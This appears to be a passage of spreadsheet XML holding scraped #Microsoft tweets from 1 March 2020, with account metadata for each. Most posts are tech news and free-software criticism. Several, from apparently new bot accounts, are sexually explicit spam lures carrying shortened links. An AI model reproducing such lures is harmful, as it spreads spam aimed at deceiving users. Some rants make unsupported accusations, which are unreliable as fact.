'profile_banner_url': 'https://pbs.twimg.com/profile_banners/313525664/1475842931', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '5D998C', 'profile_text_color': '73AF94', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sun Mar 01 12:54:18 +0000 2020</t>
  </si>
  <si>
    <t>Sunday morning ... migrating @Raconinn @Windows 2016 Server to 2019  Sorry for the bad pic ... sun in my neck  #Microsoft #IT #ITSecurity #SundayMotivation https://t.co/Eejy68WqjG</t>
  </si>
  <si>
    <t>{'id': 1092432105278226432, 'id_str': '1092432105278226432', 'name': 'Christian', 'screen_name': 'CHR15714N1337', 'location': 'cat â€žlocationâ€œ | /dev/null', 'description': 'IT Specialist | atm student | Learning more IT-Stuff to become someday an ethical hacker &amp; a researcher for IT Security! #GlobalPlayer #ITSecurity #ThinkFuture', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 19, 'friends_count': 161, 'listed_count': 0, 'created_at': 'Mon Feb 04 14:38:05 +0000 2019', 'favourites_count': 44, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 142,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'http://pbs.twimg.com/profile_images/1235211969671704576/eX_Fu8b2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235211969671704576/eX_Fu8b2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1092432105278226432/1583332458', 'profile_link_color': '00FF00',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</si>
  <si>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12:48:57 +0000 2020</t>
  </si>
  <si>
    <t>Some coding #Swift. But #Microsoft #Dotnez is fats as well on #iOS. #iOSDev #memcantgetreserved https://t.co/PRqbwZPN50</t>
  </si>
  <si>
    <t>{'id': 4080895096, 'id_str': '4080895096', 'name': 'KKTVCAM', 'screen_name': 'kktvcamnews', 'location': 'Bremgarten bei Bern, Bern', 'description': 'ðŸ––18 year old human. IT-Apprentice in Switzerland. I like: #NetNeutrality #Nerd #Computer #Java #Apple #StarTrek #Killjoys #Swift', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5127, 'friends_count': 5509, 'listed_count': 107, 'created_at': 'Sat Oct 31 07:05:59 +0000 2015', 'favourites_count': 14017, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 15219,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'http://pbs.twimg.com/profile_images/660357991150051328/y_g05__Y_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/660357991150051328/y_g05__Y_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4080895096/1524062005',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</si>
  <si>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Sun Mar 01 12:47:41 +0000 2020</t>
  </si>
  <si>
    <t>Your face would look better between my pussy lips !  #Beaver County   #truth #microsoft https://t.co/1qnb38Aj3p</t>
  </si>
  <si>
    <t>{'id': 1234079951143473152, 'id_str': '1234079951143473152', 'name': 'Sara Jackson', 'screen_name': 'pamartade', 'location': 'Everett, USA', 'description': 'Love Sayings That Will Touch Your Hearts', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 50, 'listed_count': 0, 'created_at': 'Sun Mar 01 11:36:09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'http://pbs.twimg.com/profile_images/1234084106520190977/Dl_ujsIr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234084106520190977/Dl_ujsIr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234079951143473152/1583063583',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</si>
  <si>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12:46:00 +0000 2020</t>
  </si>
  <si>
    <t>#Reading #WefBookClub 
wefbookclub 
These are the 5 books microsoft CEO, Satya Nadella recommended at #Davos. 
#satyanadella #bookrecommendations #microsoft #bookstagram https://t.co/hrnAXNeVYZ</t>
  </si>
  <si>
    <t>{'id': 109984602, 'id_str': '109984602', 'name': 'Carlos Bravo \uf8ff', 'screen_name': 'carlosbrtw', 'location': 'Lima, Peru', 'description': 'Master in IT&amp;Business, I love running&amp;sports, travels&amp;living, sciences&amp;tech, music&amp;films.. and meet new people, in Lima again.. :)', 'url': 'https://t.co/D1UUk82SuP', 'entities': {'url': {'urls': [{'url': 'https://t.co/D1UUk82SuP', 'expanded_url': 'http://www.facebook.com/carlos.bravo', 'display_url': 'facebook.com/carlos.bravo', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 202, 'friends_count': 433, 'listed_count': 7, 'created_at': 'Sat Jan 30 23:21:24 +0000 2010', 'favourites_count': 3550, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12705,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'http://pbs.twimg.com/profile_images/880901562918248448/jW6OFyli_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/880901562918248448/jW6OFyli_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/109984602/1484329727', 'profile_link_color': '93A644', 'profile_sidebar_border_color': 'EEEEEE', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sun Mar 01 12:44:59 +0000 2020</t>
  </si>
  <si>
    <t>Heading home from @scottishsummit today and look what I come across... Ingram Street. That's a sign that next year more of my @IMCloud_UK &amp;amp; wider global team @IngramCloud will be gathering in Glasgow!! #ScottishSummit was awesome!! #SS2020 #Microsoft #IngramMicroCloud #MSAdvocate https://t.co/wKca09Kc0e</t>
  </si>
  <si>
    <t>Sun Mar 01 12:43:32 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 12:42:20 +0000 2020</t>
  </si>
  <si>
    <t>Top story: Marcel Zehner on LinkedIn: #microsoft #msignitethetour #makeitnoble | 23 comments https://t.co/fr74DqoXRY, see more https://t.co/dzNIo8XPyk</t>
  </si>
  <si>
    <t>{'id': 231511391, 'id_str': '231511391', 'name': 'Patrick Lownds', 'screen_name': 'PatrickLownds', 'location': 'London', 'description': 'Technical Architect - working for HPE WW, with a focus on virtualization + Cloud. Microsoft MVP - CDM (Hyper-V). Author x 5. Quins fan! England Rugby L2.', 'url': 'https://t.co/FOeGm2SUij', 'entities': {'url': {'urls': [{'url': 'https://t.co/FOeGm2SUij', 'expanded_url': 'http://h30507.www3.hp.com/t5/Transforming-IT-Blog/bg-p/transforming-it#.UxgnEMJFCtU', 'display_url': 'h30507.www3.hp.com/t5/Transforminâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1656, 'friends_count': 560, 'listed_count': 707, 'created_at': 'Tue Dec 28 18:45:51 +0000 2010', 'favourites_count': 7702, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 40986,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'http://pbs.twimg.com/profile_images/649868684714987520/i9kGHFNL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/649868684714987520/i9kGHFNL_normal.jpg',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</si>
  <si>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12:37:48 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Surface Duo Smartphone Shown In a Video.
The "peek" feature of the device looks cool!
#Microsoft #SurfaceDuo
#DailyTechDose
Read More: https://t.co/EJmMWPRmnF https://t.co/O2MgJLjXX2</t>
  </si>
  <si>
    <t>{'id': 760468827310350336, 'id_str': '760468827310350336', 'name': 'Tech Pill', 'screen_name': 'TechPillPak', 'location': 'Karachi, Pakistan', 'description': 'Tech Pill provides you your daily dose of tech news. Whether it be new products or any latest news, Tech Pill will always keep you updated.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 18, 'listed_count': 0, 'created_at': 'Tue Aug 02 13:34:32 +0000 2016', 'favourites_count': 0,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'http://pbs.twimg.com/profile_images/1134933043800694785/lf355n32_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1134933043800694785/lf355n32_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/760468827310350336/1559424100',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</si>
  <si>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12:35:29 +0000 2020</t>
  </si>
  <si>
    <t>People who develop things using #proprietarysoftware crap like Flash or #microsoft tools find  that their code soon becomes worse than worthless https://t.co/odKrgndezS</t>
  </si>
  <si>
    <t>Sun Mar 01 12:34:05 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Edge Chromium now available along with Windows 10 Update https://t.co/wJaoQb5RSR #windows10 #windowsinsiders #microsoft #windowsupdate</t>
  </si>
  <si>
    <t>{'id': 14111661, 'id_str': '14111661', 'name': 'Anand Narayanaswamy', 'screen_name': 'visualanand', 'location': 'Thiruvananthapuram, Kerala, IN', 'description': 'Windows Insider MVP | Author: Manorama Year Book &amp; Digit | #Blogger, #Reviewer | #Unacademy #Educator', 'url': 'https://t.co/KqVQsULG23', 'entities': {'url': {'urls': [{'url': 'https://t.co/KqVQsULG23', 'expanded_url': 'http://netans.com/', 'display_url': 'netans.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1011, 'friends_count': 2102, 'listed_count': 188, 'created_at': 'Mon Mar 10 05:17:25 +0000 2008', 'favourites_count': 934, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9120,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'http://pbs.twimg.com/profile_images/427676960643219456/w2rcxItA_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/427676960643219456/w2rcxItA_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14111661/1404296063',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</si>
  <si>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12:32:02 +0000 2020</t>
  </si>
  <si>
    <t>#day063 #100daysofcode went to #SheCodes for a casual #hackday and worked on some #Microsoft #botframework stuff in #python Always more fun when you get to code with people you love being around  https://t.co/giJ1f70krQ</t>
  </si>
  <si>
    <t>Sun Mar 01 12:30:28 +0000 2020</t>
  </si>
  <si>
    <t>#ibm #marketing it a lot like #microsoft marketing https://t.co/1SCL3ovrdB</t>
  </si>
  <si>
    <t>Sun Mar 01 12:30:05 +0000 2020</t>
  </si>
  <si>
    <t>Take a look inside the high-tech, high-stakes race to keep the #cloud safe,
secure and empowering for all. #CyberSecurity #Microsoft https://t.co/IQIxj75Dts #MSFTAdvocate</t>
  </si>
  <si>
    <t>{'id': 196241610, 'id_str': '196241610', 'name': 'Mahabir Bisht', 'screen_name': 'Mahabirbisht', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 83, 'friends_count': 571, 'listed_count': 2, 'created_at': 'Tue Sep 28 17:22:06 +0000 2010', 'favourites_count': 358, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1435,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</si>
  <si>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Sun Mar 01 12:28:45 +0000 2020</t>
  </si>
  <si>
    <t>It is worth reading.  #Microsoft #Windows10 https://t.co/hphpcTLLBE</t>
  </si>
  <si>
    <t>{'id': 1881187476, 'id_str': '1881187476', 'name': 'Submissive Brat', 'screen_name': 'submissive_brat', 'location': 'Bermuda Triangle', 'description': 'Femdom &amp; Spanking fetishist. Female Feet worshiper. In a polyamorous relationship w/ Red Wine &amp; Belgian Beer. â›”ï¸ Findommes who follow/DM me will be blocked. â›”ï¸', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 790, 'friends_count': 287, 'listed_count': 40, 'created_at': 'Wed Sep 18 23:29:12 +0000 2013', 'favourites_count': 99370, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 26681, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '7BC5B7', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1080162460009750530/-CsTi9LQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1080162460009750530/-CsTi9LQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1881187476/1546365518', 'profile_link_color': '194260', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '032A46', 'profile_text_color': '34897A', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sun Mar 01 12:20:45 +0000 2020</t>
  </si>
  <si>
    <t>New Video: Minecraft Vs Animation Survival Fight
https://t.co/JGHS61tPb2
#minecraft #animation #survival #fight #gaming #Microsoft #games #coronavirus https://t.co/tqmmwCuEEk</t>
  </si>
  <si>
    <t>{'id': 1199109737754845185, 'id_str': '1199109737754845185', 'name': 'Premium Tech', 'screen_name': 'PremiumTechYT', 'location': 'Universe ', 'description': 'All Your Dreams is here - Technology, Inventions, Design, Fashion, Mobile, Music, Gaming, Nature, Entertainment and More - YouTube Channel', 'url': 'https://t.co/mxoV1dM9ow', 'entities': {'url': {'urls': [{'url': 'https://t.co/mxoV1dM9ow', 'expanded_url': 'https://youtu.be/S_PMtGFRk5E', 'display_url': 'youtu.be/S_PMtGFRk5E', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 59, 'friends_count': 715, 'listed_count': 0, 'created_at': 'Mon Nov 25 23:37:12 +0000 2019', 'favourites_count': 1380, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 109, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1199117505375166464/Pg7zx8Lp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1199117505375166464/Pg7zx8Lp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1199109737754845185/1574726869',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</si>
  <si>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12:12:14 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft neutered many #freesw and #opensource people by giving them so-called 'contracts' (i.e. money, bribes) for 'consulting', turning them into so-called 'moderates' who are 'tolerant' and will restrain those who speak about what Microsoft is up to</t>
  </si>
  <si>
    <t>Sun Mar 01 12:08:00 +0000 2020</t>
  </si>
  <si>
    <t>#wisconsin has outsourced the #election to #microsoft #proprietarysoftware (it's #openwashing of Windows) https://t.co/Vz67EkpwtH see also #iowa : https://t.co/rlP8zvydcg</t>
  </si>
  <si>
    <t>Sun Mar 01 12:05:39 +0000 2020</t>
  </si>
  <si>
    <t>"Scalar is a .NET Core application for Windows and Mac (Linux pending) that works to support very large code repositories"
So #microsoft now does #embraceextendextinguish on #git -- adding to it things that aren't supported on #gnu #linux !!</t>
  </si>
  <si>
    <t>Sun Mar 01 12:03:35 +0000 2020</t>
  </si>
  <si>
    <t>Blue Cedar joins #Microsoft $MSFT Intelligent Security Association and Provides Secure In-App Connectivity for the Mobile Workforce https://t.co/nP3v90yr6T https://t.co/lDSVY162aT</t>
  </si>
  <si>
    <t>{'id': 1089978712685273090, 'id_str': '1089978712685273090', 'name': 'Stock Market News', 'screen_name': 'Stock_Market_Pr', 'location': '', 'description': 'Join us at https://t.co/hIgpgmTMGU - Stock Market News and Press Releases. Shop Stock Store at https://t.co/q4UnLpA9cR', 'url': 'https://t.co/yWIAIEqgCO', 'entities': {'url': {'urls': [{'url': 'https://t.co/yWIAIEqgCO', 'expanded_url': 'https://StocksNewsFeed.com', 'display_url': 'StocksNewsFeed.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/hIgpgmTMGU', 'expanded_url': 'http://StocksNewsFeed.com', 'display_url': 'StocksNewsFeed.com', 'indices': [11, 34]}, {'url': 'https://t.co/q4UnLpA9cR', 'expanded_url': 'https://stocksnewsfeed.com/shop', 'display_url': 'stocksnewsfeed.com/shop', 'indices': [95, 118]}]}}, 'protected': False, 'followers_count': 620, 'friends_count': 30, 'listed_count': 10, 'created_at': 'Mon Jan 28 20:09:10 +0000 2019', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 43757, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1089979474823790598/SBXMPXJt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1089979474823790598/SBXMPXJt_normal.jpg',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</si>
  <si>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12:02:53 +0000 2020</t>
  </si>
  <si>
    <t>Make me be your bitch. #North Carolina   #amateur #microsoft https://t.co/6IiytsfKrq</t>
  </si>
  <si>
    <t>{'id': 1234051170701860865, 'id_str': '1234051170701860865', 'name': 'Lori West', 'screen_name': 'steruphtenla', 'location': 'South Bend, USA', 'description': 'Sometimes the heart sees what is invisible to the eye.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 49, 'listed_count': 0, 'created_at': 'Sun Mar 01 09:41:46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'http://pbs.twimg.com/profile_images/1234053390969208832/NVufXsu3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234053390969208832/NVufXsu3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234051170701860865/1583056266',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</si>
  <si>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12:02:35 +0000 2020</t>
  </si>
  <si>
    <t>@EnghouseInteract VP of Marketing, Jeremy Payne, talks with @HenrikBystrom, Business Area Manager at @Microsoft about the impact #AI is having in the contact centre and how it complements existing operations.
#Microsoft #TechNews #ContactCentre #TechNews https://t.co/hNYAEEqWyd</t>
  </si>
  <si>
    <t>{'id': 2794378935, 'id_str': '2794378935', 'name': 'patricia merchan', 'screen_name': 'patriciamerch10', 'location': '', 'description': 'Senior Marketing Manager for customer contact specialist, Enghouse Interactive @EnghouseInterac #CX #ContactCentre #CustomerExperience. Proud mum.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 164, 'friends_count': 382, 'listed_count': 4, 'created_at': 'Tue Sep 30 11:55:36 +0000 2014', 'favourites_count': 2204, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 642,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'http://pbs.twimg.com/profile_images/1061663387652943874/IbR2j46u_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1061663387652943874/IbR2j46u_normal.jpg',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</si>
  <si>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12:00:41 +0000 2020</t>
  </si>
  <si>
    <t>Android users can now access their favorite MS office apps on the phone. 
#msoffice #android #androidapp #microsoft #technowize https://t.co/nx4EmujOeg</t>
  </si>
  <si>
    <t>{'id': 2998138069, 'id_str': '2998138069', 'name': 'Technowize Magazine', 'screen_name': 'technowize', 'location': 'New York, NY', 'description': 'Technowize is an innovative, digitally oriented #techmagazine with a unique editorial vision towards pioneering stories across various aspects of technology.', 'url': 'https://t.co/S6INbBybQa', 'entities': {'url': {'urls': [{'url': 'https://t.co/S6INbBybQa', 'expanded_url': 'https://www.technowize.com/', 'display_url': 'technowize.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 919, 'friends_count': 589, 'listed_count': 9, 'created_at': 'Tue Jan 27 08:55:05 +0000 2015', 'favourites_count': 228, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1997,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'http://pbs.twimg.com/profile_images/1128530682010112000/aw9_b8J__normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1128530682010112000/aw9_b8J__normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2998138069/1582896095', 'profile_link_color': '075E7F',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</si>
  <si>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12:00:32 +0000 2020</t>
  </si>
  <si>
    <t>Have many repos in #microsoft #github (a #proprietarysoftware trap)  == I am too incompetent to set up git, so I am outsourcing everything to a company that will spy on my developers and on my users</t>
  </si>
  <si>
    <t>Sun Mar 01 12:00:06 +0000 2020</t>
  </si>
  <si>
    <t>Using #Microsoft #Secure Score to implement #cloud controls - #CDM #TIC #ZeroTrust Brian Tirch https://t.co/5nL0T6BcHT #MSFTAdvocate</t>
  </si>
  <si>
    <t>Sun Mar 01 12:00:00 +0000 2020</t>
  </si>
  <si>
    <t>Why bother with all the usual - make today a lazy Sunday. @BryanRK played through #FableAnniversary just for the occassion - of course it includes The Lost Chapters. Watch: (https://t.co/dvIDxoFTBg). #Gaming #YouTube #LetsPlay #Microsoft #PC #Steam #Fantasy #Classic #RolePlaying https://t.co/xbPiHhyk0z</t>
  </si>
  <si>
    <t>{'id': 266089574, 'id_str': '266089574', 'name': 'The Level Lounge', 'screen_name': 'TheLevelLounge', 'location': 'Blacksburg, VA', 'description': 'Patreon: (https://t.co/pgN94hVWhX) Watch: (https://t.co/Ov4rqtMbcD) Read: (https://t.co/crMlSva4ED)', 'url': 'https://t.co/Ov4rqtMbcD', 'entities': {'url': {'urls': [{'url': 'https://t.co/Ov4rqtMbcD', 'expanded_url': 'https://www.youtube.com/channel/UCekw6EmDa6yTSd55okhEWKw', 'display_url': 'youtube.com/channel/UCekw6â€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/pgN94hVWhX', 'expanded_url': 'https://www.patreon.com/The_Level_Lounge', 'display_url': 'patreon.com/The_Level_Lounâ€¦', 'indices': [10, 33]}, {'url': 'https://t.co/Ov4rqtMbcD', 'expanded_url': 'https://www.youtube.com/channel/UCekw6EmDa6yTSd55okhEWKw', 'display_url': 'youtube.com/channel/UCekw6â€¦', 'indices': [43, 66]}, {'url': 'https://t.co/crMlSva4ED', 'expanded_url': 'http://thelevellounge.blogspot.com', 'display_url': 'thelevellounge.blogspot.com', 'indices': [75, 98]}]}}, 'protected': False, 'followers_count': 195, 'friends_count': 4, 'listed_count': 7, 'created_at': 'Mon Mar 14 16:49:57 +0000 2011', 'favourites_count': 306, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 398,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'http://pbs.twimg.com/profile_images/1142830968346222593/R_TmjuOh_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1142830968346222593/R_TmjuOh_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/266089574/1547436466',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</si>
  <si>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From #Bean to Cup , how #BlockChain can promote fair payment for #Farmers - #Microsoft #Africa #Coffee Michelle Burns INTERNATIONAL COFFEE ORGANISATION #Starbucks https://t.co/5QRWYm9ZBQ #MSFTAdvocate</t>
  </si>
  <si>
    <t>Sun Mar 01 11:58:54 +0000 2020</t>
  </si>
  <si>
    <t>Ranking the "contributions" of companies to "Open Source" based on the number of repos they have on #microsoft #github is like measuring the degree of stupidity (or technical incompetence) of these companies, outsourcing their operations to a #proprietarysoftware trap</t>
  </si>
  <si>
    <t>Sun Mar 01 11:56:18 +0000 2020</t>
  </si>
  <si>
    <t>" #Microsoft Announcements on Azure HEY HI"
So #microsoft 'innovation' or INNOVA~1 is labeling servers "cloud" or "AZURE" and then algorithms become "HEY HI"
Company of marketers and lawyers</t>
  </si>
  <si>
    <t>Sun Mar 01 11:55:00 +0000 2020</t>
  </si>
  <si>
    <t>Remotely Connect #Azure ExpressRoute via Satellite
 #Hybrid #Microsoft
https://t.co/4yqhBDB3BD</t>
  </si>
  <si>
    <t>Sun Mar 01 11:47:25 +0000 2020</t>
  </si>
  <si>
    <t>My legs ache without your caresses... #Worcester   #microsoft #art https://t.co/xFrBFrd5Bp</t>
  </si>
  <si>
    <t>{'id': 1233816802460864513, 'id_str': '1233816802460864513', 'name': 'Carrie Smith', 'screen_name': 'zarbenzcenway', 'location': 'Anchorage, USA', 'description': 'Money can buy you a fine dog, but only love can make him wag his tail. Kinky Friedman', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 9, 'friends_count': 62, 'listed_count': 0, 'created_at': 'Sat Feb 29 18:10:28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'http://pbs.twimg.com/profile_images/1233977080527949824/UZHupHJ4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233977080527949824/UZHupHJ4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1233816802460864513/1583003873',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</si>
  <si>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11:43:50 +0000 2020</t>
  </si>
  <si>
    <t>#iprogrammer promoting #proprietarysoftware and #microsoft trap designed to make people's projects not compatible with #freesw #git  https://t.co/qwsVBLwJql</t>
  </si>
  <si>
    <t>Sun Mar 01 11:36:03 +0000 2020</t>
  </si>
  <si>
    <t>#Intel has refreshed its #graphic #software #IGCC with one of the most valuable highlights from both #Nvidia #GeForce #Experience and #AMD #Adrenalin offer #Microsoft #GPU #Processor #gaming #TechApprise #Startups #Technology #Media #Reporting #News 
Visit https://t.co/LXniQ4yq30 https://t.co/mHjI8WrYJj</t>
  </si>
  <si>
    <t>{'id': 773795237173035008, 'id_str': '773795237173035008', 'name': 'TechApprise', 'screen_name': 'AppriseTech', 'location': 'India', 'description': 'Reporting and media publisher on business of startups, venture capital funding, cybersecurity, breaking tech, apps/gadgets, enterprise, and socio-tech issues.', 'url': 'https://t.co/OjtsADaquV', 'entities': {'url': {'urls': [{'url': 'https://t.co/OjtsADaquV', 'expanded_url': 'https://www.techapprise.com/', 'display_url': 'techapprise.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 139, 'friends_count': 43, 'listed_count': 2, 'created_at': 'Thu Sep 08 08:08:55 +0000 2016', 'favourites_count': 35,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'http://pbs.twimg.com/profile_images/1234063932748259328/f9XXZ2vg_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234063932748259328/f9XXZ2vg_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/773795237173035008/1583060170',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</si>
  <si>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11:35:02 +0000 2020</t>
  </si>
  <si>
    <t>We love #SharePoint! Perhaps you feel differently? Check out our guide here - you can become a lover of the platform too! https://t.co/34frfpIIjT 
#SharePointHelp #Office365 #Office365Help #Microsoft https://t.co/RKVK2YvbYN</t>
  </si>
  <si>
    <t>Sun Mar 01 11:34:46 +0000 2020</t>
  </si>
  <si>
    <t>Support me with likes on the site. I need it very much. You video in dm
https://t.co/WojQdvci4t
#Edison
 #microsoft #jewelry https://t.co/CnyhmJ1yZm</t>
  </si>
  <si>
    <t>{'id': 1233816530217062406, 'id_str': '1233816530217062406', 'name': 'Leslie Adams', 'screen_name': 'roavimapwu', 'location': 'Savannah, USA', 'description': 'I swear I couldnâ€™t love you more than I do right now, and yet I know I will tomorrow', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 36, 'listed_count': 0, 'created_at': 'Sat Feb 29 18:09:23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'http://pbs.twimg.com/profile_images/1234048826274701313/2F8D48JV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234048826274701313/2F8D48JV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1233816530217062406/1583004702',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</si>
  <si>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11:32:50 +0000 2020</t>
  </si>
  <si>
    <t>This article repeats intentional lies from #microsoft intended to distract from its close connection to #oil giants https://t.co/xBWiiEYPb2</t>
  </si>
  <si>
    <t>Sun Mar 01 11:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Move one step closer to getting #Azure certified with this Azure Portal tutorial https://t.co/In7tGJbRKc.
#Microsoft #cloud #AWS #CloudComputing #SundayMotivation</t>
  </si>
  <si>
    <t>Sun Mar 01 11:22:22 +0000 2020</t>
  </si>
  <si>
    <t>Stephen Emmott, HEAD of the Computational Science Laboratory based at #Microsoft   Research Cambridge! WHY WE ARE FUCKED... #10Billion: https://t.co/7PcH69h3K8 Only for strong nerves! https://t.co/K6b4PWzZ9k</t>
  </si>
  <si>
    <t>{'id': 2180850730, 'id_str': '2180850730', 'name': 'Alessandra Soraya', 'screen_name': 'AlessandraMuc', 'location': 'Munich Germany', 'description': 'ðŸŒ¹ Animallover, Eco-Activist, Author, Medial- Psychological Life Counselling  https://t.co/AwFy8t3tLSðŸŒ¹', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/AwFy8t3tLS', 'expanded_url': 'http://www.natural-visions.de', 'display_url': 'natural-visions.de', 'indices': [77, 100]}]}}, 'protected': False, 'followers_count': 193, 'friends_count': 1156, 'listed_count': 0, 'created_at': 'Thu Nov 14 16:13:49 +0000 2013', 'favourites_count': 1377, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1104,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'http://pbs.twimg.com/profile_images/1224009975464448005/y4JjWhtT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224009975464448005/y4JjWhtT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2180850730/1580218872',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</si>
  <si>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11:21:02 +0000 2020</t>
  </si>
  <si>
    <t>"...while not every #tech business has the scope of #Microsoft, there are seven dimensions of #AI that all companies in the field should recognise and explore in order to achieve the same-targeted levels of power, ethics, and trust:"
https://t.co/JaiV3Ad55a
@AIESConf @aiethicslab</t>
  </si>
  <si>
